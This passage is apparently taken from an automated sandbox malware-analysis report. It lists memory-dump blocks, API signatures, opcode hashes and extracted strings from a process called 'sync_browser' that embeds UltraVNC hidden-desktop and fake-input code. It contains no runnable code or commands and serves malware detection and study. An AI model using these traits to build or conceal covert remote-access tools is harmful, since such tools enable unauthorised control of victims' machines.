                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalDeleteSection$FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3328731263-0
                                                                    • Opcode ID: 9dd024a0743743ff4cf6db73d8cdcba100ffa6c5f44379b46dcf004888688eea
                                                                    • Instruction ID: faad45e6cd7fd3893955d800b986643358c0d5dd9a5049a9291a6d9ec8986142
                                                                    • Opcode Fuzzy Hash: 9dd024a0743743ff4cf6db73d8cdcba100ffa6c5f44379b46dcf004888688eea
                                                                    • Instruction Fuzzy Hash: 75215121B09B85A6EA58DB20E9A02FD6368FF91750F444132C6AEC32A1DF7CE176C750
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                    • String ID:
                                                                    • API String ID: 1445889803-0
                                                                    • Opcode ID: 5fd10cac5a6f9bb249cac31feee61d70b85b460cd106259e4606b4f7c020a879
                                                                    • Instruction ID: b5cb51b9f5656a54426410dc051274a095244e166d8545ba3bf2b9626854c3f5
                                                                    • Opcode Fuzzy Hash: 5fd10cac5a6f9bb249cac31feee61d70b85b460cd106259e4606b4f7c020a879
                                                                    • Instruction Fuzzy Hash: 8D01C821618B1982E7409F21FD4426D6364FF05B90F546532EE5E877A4CE3CD8B78700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Event$CriticalInitializeSection
                                                                    • String ID:
                                                                    • API String ID: 4164307405-0
                                                                    • Opcode ID: c4fdc54b808940450c7e6836e95b05b7c8ed45843037277cd8a2a281f8498f58
                                                                    • Instruction ID: e25edb10d9d033ddcec8424b161890a03d56fe75829ce93eec0e872f2589d3af
                                                                    • Opcode Fuzzy Hash: c4fdc54b808940450c7e6836e95b05b7c8ed45843037277cd8a2a281f8498f58
                                                                    • Instruction Fuzzy Hash: 0101CE72504B45C2EB048F25E9841ACB3BCFBA8B98B140126CA9D877A8CF38C4A6C740
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __doserrno_errno
                                                                    • String ID:
                                                                    • API String ID: 921712934-0
                                                                    • Opcode ID: d406b4a9bfd038921951594095831198988d57d612f0112f0ddf710c3ea7d616
                                                                    • Instruction ID: 136da19ea3ff4c372ff1b8f23c60ee93e8349a8c62a09154bd0ea19d5615a09a
                                                                    • Opcode Fuzzy Hash: d406b4a9bfd038921951594095831198988d57d612f0112f0ddf710c3ea7d616
                                                                    • Instruction Fuzzy Hash: 45018162E1D66EC5EA056B54CC4137C2154AF95B62F515333E52D863D2CF6C6823A220
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: gethostbynamesprintf
                                                                    • String ID: %d.$IP address unavailable
                                                                    • API String ID: 4032199589-2983120142
                                                                    • Opcode ID: 1844eddde6bdd16f9ed8f1280075efd27ff06d6aa399f9eaa6a91d19b8d539c6
                                                                    • Instruction ID: 82da22f2658a57c894a093b5ca996ebf46ebe6c2c99c2617307560843477a804
                                                                    • Opcode Fuzzy Hash: 1844eddde6bdd16f9ed8f1280075efd27ff06d6aa399f9eaa6a91d19b8d539c6
                                                                    • Instruction Fuzzy Hash: 8A41F631618A8981D621CB25E84056EBBA8FB84BF4F504336EFAE83BD5DF3CD1568740
                                                                    APIs
                                                                    • LoadCursorA.USER32 ref: 00007FF6DC0F0925
                                                                      • Part of subcall function 00007FF6DC0ED930: InitializeCriticalSection.KERNEL32 ref: 00007FF6DC0ED95E
                                                                      • Part of subcall function 00007FF6DC0ED930: InitializeCriticalSection.KERNEL32 ref: 00007FF6DC0ED9EB
                                                                      • Part of subcall function 00007FF6DC0ED930: LoadLibraryA.KERNEL32 ref: 00007FF6DC0EDA0D
                                                                      • Part of subcall function 00007FF6DC0ED930: GetProcAddress.KERNEL32 ref: 00007FF6DC0EDA30
                                                                      • Part of subcall function 00007FF6DC0ED930: LoadLibraryA.KERNEL32 ref: 00007FF6DC0EDA51
                                                                      • Part of subcall function 00007FF6DC0ED930: GetProcAddress.KERNEL32 ref: 00007FF6DC0EDA6D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load$AddressCriticalInitializeLibraryProcSection$Cursormalloc
                                                                    • String ID: vncDesktopSW.cpp : SWinit $vncdesktop.cpp : failed to start hook thread$vncdesktop.cpp : initialising desktop handler
                                                                    • API String ID: 2513085289-3031267129
                                                                    • Opcode ID: 1873326b8f4cfb085588ecdcb6f02ef7e0e864c911988560d8123a10f1f5999c
                                                                    • Instruction ID: 92ce22b376deeb6093500fd9633033eac4dc3a80f6357974f5c315708c43718e
                                                                    • Opcode Fuzzy Hash: 1873326b8f4cfb085588ecdcb6f02ef7e0e864c911988560d8123a10f1f5999c
                                                                    • Instruction Fuzzy Hash: 67215C31618B9592E6188B60E9001EDA3A8FB84B90F544636DAAD97795DF3DE0768340
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DesktopInputOpen
                                                                    • String ID: Default
                                                                    • API String ID: 601053899-753088835
                                                                    • Opcode ID: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
                                                                    • Instruction ID: 701091b4238fb75b04a0b8ac7ea8498119d520a16fdd030a78c50da417677b57
                                                                    • Opcode Fuzzy Hash: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
                                                                    • Instruction Fuzzy Hash: 8C218135A1C69681E631DB11F8167FE63A9FB8A744F940032DA9D83794DF3CD02ACB00
                                                                    APIs
                                                                    Strings
                                                                    • HideDesktop.cpp : Restored SPI value for 0x%04x to 0x%08x, xrefs: 00007FF6DC0CA8B0
                                                                    • HideDesktop.cpp : Failed to restore SPI value for 0x%04x (0x%08x), xrefs: 00007FF6DC0CA89F
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorInfoLastParametersSystem
                                                                    • String ID: HideDesktop.cpp : Failed to restore SPI value for 0x%04x (0x%08x)$HideDesktop.cpp : Restored SPI value for 0x%04x to 0x%08x
                                                                    • API String ID: 2777246624-1049114938
                                                                    • Opcode ID: cfadfbb5a052f751d6cf6726dcbde3c23d3e636a514a63c68ec439c87cd35a12
                                                                    • Instruction ID: 00d5346071f1cb410ed041c90eb6a4fcfa6442f74eb27b7cc71342d4b50c7814
                                                                    • Opcode Fuzzy Hash: cfadfbb5a052f751d6cf6726dcbde3c23d3e636a514a63c68ec439c87cd35a12
                                                                    • Instruction Fuzzy Hash: 30218031A0CA8A86E714CF11F9406AD77A4FB88748F540136DA8E97B58DF3DE52BC700
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Virtual
                                                                    • String ID: fake %d down$fake %d up
                                                                    • API String ID: 4278518827-2496597273
                                                                    • Opcode ID: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
                                                                    • Instruction ID: e025ee1153daed24d0f63bb36f8bd778a3ef2cdd2c4fbf2e5c0e9fca0935cd17
                                                                    • Opcode Fuzzy Hash: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
                                                                    • Instruction Fuzzy Hash: 08012621F196E682F310872AA8401BD6BA6AFC8704F58C037D94E837A5CF3DD867C700
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$InfoLoadParametersSystem$AddressCloseFreeOpenProcQueryValue
                                                                    • String ID: HideDesktop.cpp : Killwallpaper %i$HideDesktop.cpp : Killwallpaper %i %i
                                                                    • API String ID: 542764273-2415377678
                                                                    • Opcode ID: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
                                                                    • Instruction ID: ae8ab1c9fcfcd97aff974a7fcf6bffbe7a046db825dd854d686b4adf0a4aeee2
                                                                    • Opcode Fuzzy Hash: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
                                                                    • Instruction Fuzzy Hash: 74013971A2855B92F6409B20E904ABD2364ABA4308F404133D80ED3661CE3DA23BC761
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ProcessWindow$CurrentFindThread
                                                                    • String ID: WinVNC Tray Icon
                                                                    • API String ID: 1332243453-1071638575
                                                                    • Opcode ID: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
                                                                    • Instruction ID: c09d9e8618630a825e500138a6b78e3678d3d1a4075131f4bfde426c6a2b3122
                                                                    • Opcode Fuzzy Hash: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
                                                                    • Instruction Fuzzy Hash: 22F05421B2C74582EB948B66BC5157DA2A4FF887C4F881037EA5E86754DF3CD5A7C700
                                                                    APIs
                                                                    • malloc.LIBCMT ref: 00007FF6DC0E2328
                                                                      • Part of subcall function 00007FF6DC178C34: _FF_MSGBANNER.LIBCMT ref: 00007FF6DC178C64
                                                                      • Part of subcall function 00007FF6DC178C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF6DC18329C,?,?,?,00007FF6DC187749,?,?,?,00007FF6DC1877F3), ref: 00007FF6DC178C89
                                                                      • Part of subcall function 00007FF6DC178C34: _callnewh.LIBCMT ref: 00007FF6DC178CA2
                                                                      • Part of subcall function 00007FF6DC178C34: _errno.LIBCMT ref: 00007FF6DC178CAD
                                                                      • Part of subcall function 00007FF6DC178C34: _errno.LIBCMT ref: 00007FF6DC178CB8
                                                                    • free.LIBCMT ref: 00007FF6DC0E2564
                                                                    • free.LIBCMT ref: 00007FF6DC0E2617
                                                                      • Part of subcall function 00007FF6DC178BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF6DC17748C), ref: 00007FF6DC178C0A
                                                                      • Part of subcall function 00007FF6DC178BF4: _errno.LIBCMT ref: 00007FF6DC178C14
                                                                      • Part of subcall function 00007FF6DC178BF4: GetLastError.KERNEL32(?,?,?,00007FF6DC17748C), ref: 00007FF6DC178C1C
                                                                    Strings
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF6DC0E230B
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
                                                                    • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called
                                                                    • API String ID: 1063416079-2438250478
                                                                    • Opcode ID: c8127eda37e24eb0f1373976952f84f390e4194099f3fcaac9a3a64be35eede2
                                                                    • Instruction ID: 7c8ff4ab2bf149b709d0dc1e9cd14bbb87acf487f451868174985f4d45261f6f
                                                                    • Opcode Fuzzy Hash: c8127eda37e24eb0f1373976952f84f390e4194099f3fcaac9a3a64be35eede2
                                                                    • Instruction Fuzzy Hash: C0A17C26B04A9984EB50DB36C9542AD6764FB88FA8F144332DE2E97BE5DF39C456C300
                                                                    APIs
                                                                    Strings
                                                                    • i, xrefs: 00007FF6DC0EA754
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set, xrefs: 00007FF6DC0EA5D6
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID: i$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set
                                                                    • API String ID: 3168844106-2727237473
                                                                    • Opcode ID: b9736aa724b34d719d3600d22d7a269a865bd43a142573cc82961d05dd0f907a
                                                                    • Instruction ID: b150ef84ba982d66b6b692aec19ca27404528ac1389d4a567e52db77a5f75961
                                                                    • Opcode Fuzzy Hash: b9736aa724b34d719d3600d22d7a269a865bd43a142573cc82961d05dd0f907a
                                                                    • Instruction Fuzzy Hash: B161E1627087C995E7258B25D8043BE6BA8FB8A794F144236DA9DC37C1CF3DD5A6C700
                                                                    APIs
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$CountEnterInitializeSpin_amsg_exit_lockfree
                                                                    • String ID:
                                                                    • API String ID: 3786353176-0
                                                                    • Opcode ID: f31a3eaa8913d2083ee82d7d02934215533fd9c0c8c7a5b9e183bd6558d9460c
                                                                    • Instruction ID: f1660805a8df4b93924b9499c435998044ee2bc6e72ec2cd9329b62469f3dbf9
                                                                    • Opcode Fuzzy Hash: f31a3eaa8913d2083ee82d7d02934215533fd9c0c8c7a5b9e183bd6558d9460c
                                                                    • Instruction Fuzzy Hash: 07417936A1CA9A82FB108B19E94473C63A9FF54B84F144637CA4D877A1DF3CE8228744
                                                                    APIs
                                                                    • malloc.LIBCMT ref: 00007FF6DC0CC5D4
                                                                      • Part of subcall function 00007FF6DC178C34: _FF_MSGBANNER.LIBCMT ref: 00007FF6DC178C64
                                                                      • Part of subcall function 00007FF6DC178C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF6DC18329C,?,?,?,00007FF6DC187749,?,?,?,00007FF6DC1877F3), ref: 00007FF6DC178C89
                                                                      • Part of subcall function 00007FF6DC178C34: _callnewh.LIBCMT ref: 00007FF6DC178CA2
                                                                      • Part of subcall function 00007FF6DC178C34: _errno.LIBCMT ref: 00007FF6DC178CAD
                                                                      • Part of subcall function 00007FF6DC178C34: _errno.LIBCMT ref: 00007FF6DC178CB8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno$AllocHeap_callnewhmalloc
                                                                    • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$VUUU$VUUU
                                                                    • API String ID: 908589684-1814909704
                                                                    • Opcode ID: 5345fd7311f357fadc130072c2608bf0beca503ebc7595e42aae47cd0f82b0d0
                                                                    • Instruction ID: c4d32a3f4e64d5499eefb1588c5f3acc2183edcc5df9994816aceda4c319c3cd
                                                                    • Opcode Fuzzy Hash: 5345fd7311f357fadc130072c2608bf0beca503ebc7595e42aae47cd0f82b0d0
                                                                    • Instruction Fuzzy Hash: 5C21C932B087994ADB10CB69E94022CB799E784390F081233EBAC8BBC1DE3AD013C710
                                                                    APIs
                                                                    • Sleep.KERNEL32 ref: 00007FF6DC0D7720
                                                                      • Part of subcall function 00007FF6DC0D7A30: SetEvent.KERNEL32(?,?,?,00007FF6DC0D76B4), ref: 00007FF6DC0D7A4B
                                                                      • Part of subcall function 00007FF6DC0D7A30: SetEvent.KERNEL32(?,?,?,00007FF6DC0D76B4), ref: 00007FF6DC0D7A55
                                                                      • Part of subcall function 00007FF6DC0D7A30: SetEvent.KERNEL32(?,?,?,00007FF6DC0D76B4), ref: 00007FF6DC0D7A5F
                                                                      • Part of subcall function 00007FF6DC0D7A30: InitializeCriticalSection.KERNEL32(?,?,?,00007FF6DC0D76B4), ref: 00007FF6DC0D7A8B
                                                                      • Part of subcall function 00007FF6DC0D7A30: InitializeCriticalSection.KERNEL32(?,?,?,00007FF6DC0D76B4), ref: 00007FF6DC0D7A95
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Event$CriticalInitializeSection$Sleepmalloc
                                                                    • String ID: keyEvent$start_event$stop_event
                                                                    • API String ID: 367317321-1979648887
                                                                    • Opcode ID: 75cee7831a348fbdeec11479aba58ed98617e6988499cf48a05d465c35e79d83
                                                                    • Instruction ID: 841fff286c542258a8fd3359a68f88f82a70ccd44a0a9944936c69e3ab98ed47
                                                                    • Opcode Fuzzy Hash: 75cee7831a348fbdeec11479aba58ed98617e6988499cf48a05d465c35e79d83
                                                                    • Instruction Fuzzy Hash: 8C31AB24E2DB1B81FA50AB18E55077C23909FC8744F440136DA4ECBBA6DF7EE0678B81
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterExceptionInitializeLeaveRaisemalloc
                                                                    • String ID: G
                                                                    • API String ID: 2834860089-985283518
                                                                    • Opcode ID: 1d474c01279c2a9434e3c4812ff55c46e0b017860c5d5c7f73ec849190a36a26
                                                                    • Instruction ID: b5bce22b17d4ccb77b11c49897d8c29169a78a187886d6540be958d57079b2b4
                                                                    • Opcode Fuzzy Hash: 1d474c01279c2a9434e3c4812ff55c46e0b017860c5d5c7f73ec849190a36a26
                                                                    • Instruction Fuzzy Hash: 6331743291C79586E7108F24E8443AC73A4FF44BA4F440236DA9D87AD4CF7CD4A6C701
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
